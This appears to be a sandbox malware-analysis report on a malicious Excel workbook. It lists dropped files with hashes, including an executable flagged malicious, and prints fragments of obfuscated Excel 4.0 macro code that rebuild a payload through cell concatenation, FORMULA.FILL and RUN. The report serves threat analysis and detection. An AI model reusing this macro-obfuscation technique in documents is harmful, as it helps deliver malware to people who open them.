          C:\Users\user\AppData\Local\Temp\CabE004.tmp
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
          Category:dropped
          Size (bytes):60080
          Entropy (8bit):7.995256720209506
          Encrypted:true
          SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
          MD5:6045BACCF49E1EBA0E674945311A06E6
          SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
          SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
          SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
          C:\Users\user\AppData\Local\Temp\F6DE0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):68561
          Entropy (8bit):7.608770850697448
          Encrypted:false
          SSDEEP:1536:m+yXkNLPHqvAk/Vi6+YDT7Hbc8hxCCV25Z:m+yUNLP4lA6+YHcId25Z
          MD5:B67C936515D2A419269AB8E2D93204DE
          SHA1:44331DB15B55BAD0D97DEFE091ACF39EE39248A3
          SHA-256:E933C429EFC848987756125BFE9C3AB422F5E2EFCAEF5F945718AC31F90C9658
          SHA-512:6B3D48B0153F8AC2D2AC7A4FB9462E145321D13AFD8C9284A94837DC5108FD55998CA902B7FD8EC83A8549F5A0B3B8CA4C7B951818AE04B03CF578BC3F5DA210
          Malicious:false
          Reputation:low
          Preview: .TKo.0.....0t-l.=.....>.].u?...X.^..6....4k. ^.^l... %rz.r.y.D&.^.w..WA........h(..`..^........:"5...!..CJR.:..D..... .gZ..j......7....s....M.q.O677+..q.'.B4W..E........1.-.a Fk.d.N>{.....Y..`"..uqX.D.z+....r&........u...%..c...8Iq..B...;.*.....9..:<.T.$...?$..Y..s.P.....:..AW2g..I]....O5....zD&.CY.....R^[.O..tLy...WN..n.-.....X.....%:...>.H<>..^..^/.62..lp..zi..]~..^.a.n...mY.../.......PK..........!...<............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C...nH....
          C:\Users\user\AppData\Local\Temp\TarE005.tmp
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):156885
          Entropy (8bit):6.30972017530066
          Encrypted:false
          SSDEEP:1536:NlR6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMuGmO:N2UJcCyZfdmoku2SL3kMnBGuzO
          MD5:9BE376D85B319264740EF583F548B72A
          SHA1:6C6416CBC51AAC89A21A529695A8FCD3AD5E6B85
          SHA-256:07FDF8BC502E6BB4CF6AE214694F45C54A53228FC2002B2F17C9A2EF64EB76F6
          SHA-512:8AFC5D0D046E8B410EC1D29E2E16FB00CD92F8822D678AA0EE2A57098E05F2A0E165858347F035AE593B62BF195802CB6F9A5F92670041E1828669987CEEC7DE
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: 0..d...*.H.........d.0..d....1.0...`.H.e......0..T...+.....7.....T.0..T.0...+.....7........L.E*u...210519191503Z0...+......0..T.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 11 06:00:40 2021, atime=Fri Jun 11 06:00:40 2021, length=8192, window=hide
          Category:dropped
          Size (bytes):867
          Entropy (8bit):4.480521840960962
          Encrypted:false
          SSDEEP:12:85Q8LoLgXg/XAlCPCHaXtB8XzB/04uX+Wnicvb63+bDtZ3YilMMEpxRljKtTdJP8:85I/XTd6jJuYe4SDv3qArNru/
          MD5:D1901B672D68B95B87925635D8835BDF
          SHA1:3B0CAF79347B90E7F276CB084D1074E24599E8A2
          SHA-256:DB6552B4D3F6608CE90336C480BEC6C4E963B8815E377D16E895B186F040AA34
          SHA-512:83D9FFBF227CCBF7539E2DBFD061F446FD7107CDB06FF3967499214442C0EF4E1B23E50B481E85991ECFE0E794C73A8A4CF6DD71359C7B75BAEF747455BA0331
          Malicious:false
          Reputation:low
          Preview: L..................F...........7G...z=}.^...z=}.^... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.8..Desktop.d......QK.X.R.8*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-47-2637.LNK
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Fri Jun 11 06:00:40 2021, atime=Fri Jun 11 06:00:40 2021, length=92672, window=hide
          Category:dropped
          Size (bytes):2088
          Entropy (8bit):4.536758685214297
          Encrypted:false
          SSDEEP:24:8i/XTd6jFyq4Me431Dv3qAdM7dD2i/XTd6jFyq4Me431Dv3qAdM7dV:8i/XT0jFB4MdEAQh2i/XT0jFB4MdEAQ/
          MD5:709594534DD8AAF9078F756A8817A71A
          SHA1:1FAF88E21AE6ED12EAE26EB687EEC62C97B6D7F2
          SHA-256:C411BE565BE4A1C8D52CB9FD1510C1CC565F34BCAE4385966579D84C325C74D1
          SHA-512:DF93EE96B3EC505691231141EBEF51DB12E8DB0CBC416584E27A8A4C4D9F31E181CC095F27FD21DB1CF709B0C8350CDB0867F3E9308DD3359890EF03010C8CB1
          Malicious:false
          Preview: L..................F.... ....}..{...z=}.^..E.G}.^...j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..h...R.8 .DOCUME~1.XLS..V.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop\document-47-2637.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9F.C....
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):101
          Entropy (8bit):4.781102818999889
          Encrypted:false
          SSDEEP:3:oyBVomMY9LRkKSd6YCZELRkKSd6YCmMY9LRkKSd6YCv:dj6Y9LaJdzgELaJdzUY9LaJdzs
          MD5:CC574425794FB97F59C2DC249939493A
          SHA1:8CA2DFD4C2535E0FFEB160319D2CD079758B7F8D
          SHA-256:1D977854F9C0DDF7462B6991CA2B6026C4FFCAF52F158A2C7B81B8FBEE5E35F0
          SHA-512:6C9C7CAFA742354DB174653D4C1CF9521AC10C67177FB2E26A85AE1267F1A45094BD1F1AE3C0B53836D5210F6083906F17C26A28A197D0CCF2F76D7447272E43
          Malicious:false
          Preview: Desktop.LNK=0..[xls]..document-47-2637.LNK=0..document-47-2637.LNK=0..[xls]..document-47-2637.LNK=0..
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZH9NG0C7.txt
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:ASCII text
          Category:downloaded
          Size (bytes):99
          Entropy (8bit):4.738309873166655
          Encrypted:false
          SSDEEP:3:12mZI6A3xQlGTKvUQ2NwS2TdeX3Rsa/n:8YIr3xUGZXN2TwXzn
          MD5:1013A2F28CACF36A2234BC56C8B76B40
          SHA1:25B9130C97E0351F0707D53C72E4E1C700C324BE
          SHA-256:4B034D46F013E42559260BD248B7B0011EE83AE4D836D14FB4083A3BE287C3D2
          SHA-512:F28E38E260D8F9B5ADC14C6F449299D6318268412C2BDC9616E46CD9C22AF6DD5546F4684F549EF2FA8B1AD00400370AD2C84BD9ED4DC6704427B7D4EC7ADE73
          Malicious:false
          IE Cache URL:webhub365.com/
          Preview: PHPSESSID.hodlph97qarho6n2q5ae7qthj6.webhub365.com/.1536.1170067456.30891789.2127077170.30891663.*.
          C:\Users\user\Desktop\774F0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Applesoft BASIC program data, first line number 16
          Category:modified
          Size (bytes):99731
          Entropy (8bit):7.932017898229176
          Encrypted:false
          SSDEEP:3072:VKZ1QaE1iFKbbG46fQWnPdkuiZpKZ1SaE1/:VKZW9ocW46fjF8ZpKZ49l
          MD5:1C3608A1D6C608CAAB12624DE264B8DC
          SHA1:A83808D92C7633E5123DA9A49FA5F01F9836A256
          SHA-256:9ACD9A818075B4FA763A7B0328DB449DA693309C6EBE330B8C81F14BE566CD91
          SHA-512:4A407DA6AA2A6896391D8C967E18A516B01046D96E7A167A7EDBE4A0FBBCBC73407A72B82137452674142CDE33802B46E1081C0C5C769306736E8A9AAAADE46F
          Malicious:false
          Preview: ........g2........../.........X.:...5.IE..1`.3>...."n.^...}.6...Q.nKJD4.]..$.8........g2........../.6.......X.:...5.IE..1`.3>...."n.^...}.6...Q.nKJD4.]..$.8..........*U....\.p.p.h`.q._.C.%5R."h.sHV-....1......K.. ..<...7].1..s.Ye....bsn.....!..g.<.......$N*'.~..apH.z*\..A{./.97ViB....7a.........=............y.....@.....................a=....i..,....TC.....R@....'.....7"...z...................1.....d._..u.Db.R..h...o.1a9i.k..1...u.......@..O...B...$..3....1...).@q../Y.1...,...........u..1.....7.D.]...{...-.IGFB...e....1....L...C.D..:.i..$..f.:..U..1.*.P.'8 ..S.mX.S..XU...<'\e...Kl.>.j.q.p.0.1...........R._<@..s}..aw l.....1...l....S.[B...).....1 w.W.`.1.1.....r."aiE?D.Z..0i.}...V..C5.-.1......c.=>J.z....:.m.}.arH..!.1...[.....aB.F|S.....;."....W;b.1....=x......T.K...3,.PP..H..s..Y-1...i.%......w..o}.-....-..lj..5..1.......F3.. 4.....;...2;...x.s^.1...o......@.I.icN.{..M.".!b...1....P.r.r.'.G.H.......n...h...(6.1....=..V.2..........4.....iy..:F.1...
          C:\Users\user\Desktop\C7DE0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Applesoft BASIC program data, first line number 16
          Category:dropped
          Size (bytes):117436
          Entropy (8bit):7.9268262065554325
          Encrypted:false
          SSDEEP:3072:M2hpEu0A4iQEmRqwJOu3J5Pn/cOGWJPn/cZGW02hpEA0w:V0tA4idvu3JRFBoN0/w
          MD5:388CD90E27FA7C09A02E5490E32F9408
          SHA1:0E61310B0D55D8C1E24DCBBC9CAA79874959E308
          SHA-256:EDA8CD37F5999158DCABBD39B4292FE7692163FBCEEB68AE1BDE1166D350564B
          SHA-512:6DA5A552A3ED2229C478AAE92AAAF5436B8F6D9C2DABFD580389DA3243B486C4B7EED5748C753D57123EF474455A77EA64373AC94EE2AEE24B5D872A6268BFAC
          Malicious:false
          Preview: ........g2........../..........._`........G4.'.3P_....P...@.......*]L..V.1........g2........../.6........._`........G4.'.3P_....P...@.......*]L..V.1...........T....\.p.S.T..~.\|.`..C.0.J....hN~..\x9:..;i..~.{.Ik.1...Z.\Q......!JG..HB....}.Mu...........i.>It.W........"T.......[A.B....xa....!....=...e\............^%..........:..........2m=.....Y..) .\.q.V...j.@....>....."...*.....v3....ly......1...2....%i...J..F.:y.z....B...X.1......Bzme....Db.mD..i......D..1.......Wi^..r..B........h..Bp1...]*...gF.>. .....:9.I:U...\.1....u...c.....L......-.......b1.*.._l..|..o....7..`y....e_.*:*..i..<o.>|1...S....~....7".5A&.I.$..p..v...1.....A0.....>.Vs.....3.z2...9.L1......q.Q...=...Bz....N.$..g.Wl.1......Km.9......f..n.Q..}.&?)61.....E_..8E.-..4m).A)..H....O%1.....r...zA.s.....Nd..}.mj....q1...<.R.*..{.#...%....\Cc...?....1...e....C..O_....M.Ybz..>.SIX51......n[....$...!....z\{D>?Hx...1......ow.;xg'M......y].L.|..3.1...Mp.BX."K.p.c.?.ojj..T.v|}?f..1...
          C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Process:C:\Windows\System32\cmd.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):25600
          Entropy (8bit):5.584698658834256
          Encrypted:false
          SSDEEP:384:zKIhxI3PKZ/COyNcx5GTyoNr9MUVO9FvB3RH++x5XrIQP8S8cB5vWMiG:zKIhxI3PKZ/bIaqyCrXV+v1NrnLB5X
          MD5:7F7F391491C315A4A72EFCAC0D34FA93
          SHA1:20A18C7EA14F4E1D3044091B46D6E862B6F38708
          SHA-256:022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
          SHA-512:78D39D7FD02D4F6CA0E13D0EACADC842D5A104C31342202875F84A69C310ECF6D4DCC8F00E95B09DE936922BE0312CF956C5E955254A99113EFB3F51E26C082E
          Malicious:true
          Antivirus:
          • Antivirus: Virustotal, Detection: 0%, Browse
          • Antivirus: Metadefender, Detection: 2%, Browse
          • Antivirus: ReversingLabs, Detection: 0%
          Joe Sandbox View:
          • Filename: document-47-2637.xls, Detection: malicious, Browse
          • Filename: document-37-1849.xls, Detection: malicious, Browse
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.].*.3.*.3.*.3..)..+.3..)..).3..)..>.3..)..%.3.*.2.V.3..)..9.3..)..+.3..)..+.3.Rich*.3.........PE..L...-.[R.................B...$.......J.......`....@.................................k.....@...... ..........................$q......................................0...............................h!..@............p..$............................text...|A.......B.................. ..`.data........`.......F..............@....idata..6....p.......H..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 2 14:40:34 2021, Last Saved Time/Date: Wed Jun 2 14:40:36 2021, Security: 1
          Entropy (8bit):7.59086745125602
          TrID:
          • Microsoft Excel sheet (30009/1) 78.94%
          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
          File name:document-47-2637.xls
          File size:92165
          MD5:92dcc47a1a044fc3a2328ec6eef3918b
          SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
          SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
          SHA512:fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd
          SSDEEP:1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash:e4eea286a4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "document-47-2637.xls"

          Indicators

          Has Summary Info:True
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:False

          Summary

          Code Page:1252
          Author:Windows User
          Last Saved By:Windows User
          Create Time:2021-06-02 13:40:34
          Last Saved Time:2021-06-02 13:40:36
          Creating Application:Microsoft Excel
          Security:1

          Document Summary

          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:983040

          Streams

          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
          General
          Stream Path:\x5DocumentSummaryInformation
          File Type:data
          Stream Size:4096
          Entropy:0.308022095077
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00
          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
          General
          Stream Path:\x5SummaryInformation
          File Type:data
          Stream Size:4096
          Entropy:0.316312415339
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910
          General
          Stream Path:Workbook
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:81910
          Entropy:7.97723236264
          Base64 Encoded:True
          Data ASCII:. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65

          Macro 4.0 Code

          ,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $W$367,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($K$351),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $Y$71,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($I$385),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,,,,,,,,,t,,,,,,,,,,,,,,,,,,,,,,,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,q,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,